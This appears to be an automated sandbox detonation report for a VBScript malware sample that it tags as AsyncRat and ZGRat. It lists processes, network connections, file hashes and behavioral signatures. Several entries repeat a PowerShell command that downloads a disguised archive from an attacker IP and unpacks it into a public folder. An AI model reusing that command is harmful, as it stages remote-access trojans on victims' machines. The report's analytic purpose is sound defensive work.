C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2292 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2300 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1284 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1448 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3700 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3720 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3184 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3752 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3888 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3396 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1880 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2508 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1

C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe

"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\a.txt

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\Admin\Desktop\a.ps1"

C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe

"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Admin\Desktop\a.ps1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Admin\Desktop\a.ps1

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Desktop\a.ps1"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\aaa.txt

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\aaa.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4fc

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force

C:\Windows\System32\CScript.exe

"C:\Windows\System32\CScript.exe" "C:\Users\Admin\Desktop\a.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\aaa.vbs"

C:\Windows\System32\Notepad.exe

"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\a.vbs

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.google.com udp
NL 142.251.36.4:443 www.google.com udp
NL 142.251.36.4:443 www.google.com tcp
N/A 224.0.0.251:5353 udp
US 104.243.44.136:80 tcp
US 104.243.44.136:80 tcp
US 104.243.44.136:80 tcp
US 104.243.44.136:80 tcp
US 104.243.44.136:443 tcp
US 104.243.44.136:443 tcp
US 104.243.44.136:443 tcp
NL 216.58.214.3:80 www.gstatic.com tcp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 74.125.137.94:443 beacons.gcp.gvt2.com tcp
US 104.243.44.136:443 tcp
US 104.243.44.136:443 tcp
US 104.243.44.136:443 104.243.44.136 tcp
US 74.125.137.94:443 beacons.gcp.gvt2.com udp
US 74.125.137.94:443 beacons.gcp.gvt2.com tcp

Files

memory/2920-4-0x000000001B720000-0x000000001BA02000-memory.dmp

memory/2920-5-0x00000000026F0000-0x00000000026F8000-memory.dmp

memory/2920-6-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

memory/2920-7-0x0000000002870000-0x00000000028F0000-memory.dmp

memory/2920-8-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

memory/2920-9-0x0000000002870000-0x00000000028F0000-memory.dmp

memory/2920-10-0x0000000002870000-0x00000000028F0000-memory.dmp

memory/2920-11-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

\??\pipe\crashpad_552_UFWQIIINUEXGHRGS

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

MD5 18e723571b00fb1694a3bad6c78e4054
SHA1 afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA256 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA512 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 07d6a990d48d06a61fd3e7e83c1c1d1c
SHA1 da2e6cdc9a70a5da52655f3cb2b9f06071c07d5c
SHA256 7d06579813d4309157456e76d8b5cefc7efa4ed45bdc00e932323f4f361c4253
SHA512 1cd0eb1b9baa62208ad0e7c1ec34735e42dd9bc23c14ff72ba66795b6570eb3b706b609d27d144a628a37b2b7d9e67fcb222fd26d63a4dd537afafc573dadb4f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 f3886cb2abbd410384d2e247c1a19520
SHA1 90f9e2b731fa513c1e86b638460df7d718ad0b07
SHA256 50dbdc0db6f0d6fdc0e792c2b2fcfef681c2d3c9f9c5f9ffe2e6a23dca06378b
SHA512 95bfaf449af0231d3dc60e7dcc5ef6e5f265db3ac29890533bdc592d2feff493796b7d058a477fbe3042362d0cc382c1e02bd77af51b6036137fd4f8b3fe5a54

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 b233c62080702539447e5a72cdede799
SHA1 c2ff017b4be967a0646420e2a46a327779a2f1c9
SHA256 e549acf1a8b5e2d31a26c3694302a5b0c28f0cf51b3dae9960613ea0655ece41
SHA512 9471a6be1204970ed0968f72a2f7537a4c5c2284c6c87d1b149fe5b4178b581fc551a8c12839aace012336c65814c65f69dabe2e871262b35a5a8557bf17db5e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 14cc8305ff7b6186efbae3b462fb60df
SHA1 1c2ace083e6a7a86956e6f890524c065b572878b
SHA256 734816f6f9791578d22c82213884a3cf8fa0b7ab83ee85fad9c5e6798d4bbe9e
SHA512 00e0521d2188a69b1829d43db7b4f55898a1b649295d0c9fb98d7be088e8585ec6af7feb2e1645edd349380373973a94ffa77a6b6a4f2205d13760a3a8789c5f

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d5ab74ae398f2d9b648d5fe5c4779a91
SHA1 617ae2d562c55ab47608003f1625c7e06a3915a2
SHA256 af4f562ecaf11c4f71ac62fa6ca1cca2face95aaf247820b70ddd01e2d01284b
SHA512 b14b252d32a557c82b94020c87722e3cbc75afc688bcb3c492c9bc2a327da7906ef04efb05887f92e18569c825755ab8c862026aacc789e934dbf54c7cbb6dff

memory/300-177-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

memory/300-176-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

memory/300-179-0x0000000002C20000-0x0000000002CA0000-memory.dmp

memory/300-178-0x00000000020B0000-0x00000000020B8000-memory.dmp

memory/300-181-0x0000000002C20000-0x0000000002CA0000-memory.dmp

memory/300-180-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

memory/300-183-0x0000000002C20000-0x0000000002CA0000-memory.dmp

memory/300-182-0x0000000002C20000-0x0000000002CA0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 cadd7e6cf4e00a0cb1eed886fabeea2d
SHA1 85253620e109ba0d4e8aa58e37e9fa23ee750ae5
SHA256 8a540158f7b0f8c5c459350aaeaca020a97d8339e87b87aa2295c1ddf8878ed7
SHA512 59adbac128efb40f9164fbee4f719cb73502bffacb86dd4e42cebe29704f05f7468bf7be99aa0453589695a22146106fb815e2df1c0c0bec6fef91fac9d81868

memory/300-191-0x0000000002C20000-0x0000000002CA0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\ef61fcc9-be5e-439b-a380-392b8ddc9ac7.tmp

MD5 05705d148f14867cd4640a04eb817514
SHA1 adbf4fe123a665079de80164e90a87e3d70682af
SHA256 a1da84bf5b90d067dbe112810afa07a87d803398950b937c03816f1d1266198d
SHA512 89d9ea32df6661e912429110cb4d748195ec31a42913f23d8337df5d315f610558606ed7c14f934fa88b395f2376328514f93d6157cfbf334f9416920b133606

memory/300-199-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

memory/300-208-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

memory/300-207-0x0000000002C20000-0x0000000002CA0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 0f4f741a30afcd13b686313d31ceaac3
SHA1 eb341e2203992dbb28d7f3deb4a444eb042e70c1
SHA256 42702e2d60b5d4319ff6fab128cb6585739e0de7080dd6f8ffe7502ef33d44da
SHA512 c9d06a1c933cf1152e1c08f58c9894b31d1d42726177b8b0cb63ba82d771a997f4f165d42c0b1367085ce422f842b77854d79dfa577761db9aefd4fe5de89583

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 fa896589dc101569218d9554ad8cc547
SHA1 e4f98abc82cfb45b9deff5430f5bef716b2302cc
SHA256 a189c451f257e9c98f98a5a0bccb0f7c0877287ce59ef240341eac9480337db0
SHA512 681aaec310163a19cbbad82a6ce4133ffad1e2ec1ce400e5c9cb8ee65341174b5d0f4965f9321c2f9218374d3acd87349cb2e750449b2bc56b529d53476999cf

memory/1372-223-0x0000000001D50000-0x0000000001D51000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 7559f17b255a8b1932e72a81a240096d
SHA1 386f4a21f8c8171e7c875ef809250be6633757cf
SHA256 519310fed8e699cf88dbef66e8aabeefda883555c49f50e58bd5a86bfb945eca
SHA512 8771d4599c8ac2ec316bb8e6799ea86e846a57ce4f49609b9ade73e264cbe4896d73cbd977c0195bb7e5702ef720da9cfae01b912d3aadb49a8632f88f0e888a

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PRMODDT9PNEWFNRU6KTK.temp

MD5 c35051a64ae0888a1ecd112759fc4fa4
SHA1 d029cd66ff74a8a6fa55d6b4addab696f6c8e97c
SHA256 bd4fd9e687b305ca5db9f8359a300a7fe2eb6236a09c0360c44043097d7d860a
SHA512 7fd21af965e6dd98025567cb07397c30c0efedd2d0fc453d0943274a12227350baf58c6825db85c739a797bf1dbf7357111eebc1a5f924aac4617c85b5a97d95

memory/2224-232-0x00000000021D0000-0x00000000021D8000-memory.dmp

memory/2224-233-0x0000000002B80000-0x0000000002C00000-memory.dmp

memory/2224-231-0x000007FEF1360000-0x000007FEF1CFD000-memory.dmp

memory/2224-230-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

memory/2224-235-0x000007FEF1360000-0x000007FEF1CFD000-memory.dmp

memory/2224-238-0x0000000002B80000-0x0000000002C00000-memory.dmp

memory/2224-237-0x0000000002B80000-0x0000000002C00000-memory.dmp

memory/2224-236-0x0000000002B80000-0x0000000002C00000-memory.dmp

C:\Users\Admin\Desktop\a.ps1

MD5 7b064a6209f893bdd49ee27ab509e271
SHA1 d4cc84e215cd2b35a2241298d1782d7873399f72
SHA256 9c3f6def8ce4f73c49f861a191e7e3e36f0e9759de9bda8b0f79ca895decb8c7
SHA512 5f347947dbb13a5fc96c581308e0da8d9a217f4cc413a0c5fd0a216e1c6c96e789e7abd2ec1128a0b01ac6edf78b60097bca60b3ccff22aa89df23b168f875e2

memory/2224-239-0x000007FEF1360000-0x000007FEF1CFD000-memory.dmp

memory/320-246-0x0000000002900000-0x0000000002980000-memory.dmp

memory/320-247-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

memory/320-245-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

memory/320-248-0x0000000002900000-0x0000000002980000-memory.dmp

memory/320-249-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

memory/320-250-0x0000000002900000-0x0000000002980000-memory.dmp

memory/320-251-0x0000000002900000-0x0000000002980000-memory.dmp

memory/2636-258-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

memory/2636-259-0x0000000002DF0000-0x0000000002E70000-memory.dmp

memory/2636-262-0x0000000002DF0000-0x0000000002E70000-memory.dmp

memory/2636-261-0x0000000002DF0000-0x0000000002E70000-memory.dmp

memory/2636-260-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

memory/2636-263-0x0000000002DF0000-0x0000000002E70000-memory.dmp

memory/2636-264-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 901e0d6f7201a7be15fb48fd447fc052
SHA1 37142ec6982ed0d4a1785e3a6eb508c86d802a65
SHA256 f202496fa677af7806d28ca2922f268252dee7d4960b490cabe75ad0c0cd30a6
SHA512 1e304f8de325c960f9c6c7642703fc0188ac5c91e48022e8e79d33a6e0dfcfefc86cd5fd73fd79daae647d1644160c1e93255cea10d83603227f41ccd7d0dc1b

memory/912-278-0x0000000002CB0000-0x0000000002D30000-memory.dmp

memory/912-279-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

memory/912-281-0x0000000002CB0000-0x0000000002D30000-memory.dmp

memory/912-280-0x0000000002CB0000-0x0000000002D30000-memory.dmp

memory/912-277-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

memory/912-282-0x0000000002CB0000-0x0000000002D30000-memory.dmp

memory/912-283-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp

memory/912-284-0x0000000002CB0000-0x0000000002D30000-memory.dmp

memory/912-285-0x0000000002CB0000-0x0000000002D30000-memory.dmp

memory/912-286-0x0000000002CB0000-0x0000000002D30000-memory.dmp

memory/912-293-0x0000000002CB0000-0x0000000002D30000-memory.dmp

memory/2512-294-0x0000000002AD2000-0x0000000002AD4000-memory.dmp

memory/2512-295-0x0000000002AD0000-0x0000000002B50000-memory.dmp

memory/2512-296-0x0000000002AD0000-0x0000000002B50000-memory.dmp

memory/2512-297-0x0000000002AD0000-0x0000000002B50000-memory.dmp

memory/912-299-0x0000000002CB0000-0x0000000002D30000-memory.dmp

memory/912-300-0x0000000002CB0000-0x0000000002D30000-memory.dmp

memory/2852-301-0x0000000000230000-0x0000000000231000-memory.dmp

C:\Users\Admin\Desktop\aaa.vbs

MD5 94d9f0f40db24e05f57932150c193171
SHA1 cc52620223564a1a5a8855edc9b86ef196b57be2
SHA256 95eda985122dc3d7bc221b0fcef20eeb77503bb0bfa7fd5896fd511c4ddbb888
SHA512 edd628f6276656d0769f6b1c54e8c26efaa8b0fab334fe64df66c65cc86bb2c71b15b137c2373ac00a027841961c77f75ee712f3cd142e5fea3c6a211c6afcd0

memory/2192-310-0x0000000002A50000-0x0000000002AD0000-memory.dmp

memory/2192-311-0x0000000002A50000-0x0000000002AD0000-memory.dmp

C:\Users\Admin\Desktop\a.vbs

MD5 3c15cc7a6587bd5a38b2f3695f5fdd70
SHA1 5eb07663b508cc6288514b9d55c0bff2db78f679
SHA256 6227ddc0d33925e3981078595fa50d52819b3cab35f2800bc81eb0860ad726a3
SHA512 15bd0a4fb9c76121441b648a9256a16c5c7bcd3e7d84f36a3107934256f0b27da59c14738fd8becabee531ed0efee58feb0322ec36f277a4b3c11350f8bc3168

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-12 14:32

Reported

2024-03-12 14:35

Platform

win10v2004-20240226-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\g4.vbs"

Signatures

AsyncRat

rat asyncrat

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings C:\Windows\System32\WScript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Public\node.exe N/A
N/A N/A C:\Users\Public\node.exe N/A
N/A N/A C:\Users\Public\node.exe N/A
N/A N/A C:\Users\Public\node.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
N/A N/A C:\Users\Public\node.exe N/A
N/A N/A C:\Users\Public\node.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2324 wrote to memory of 1120 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2324 wrote to memory of 1120 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
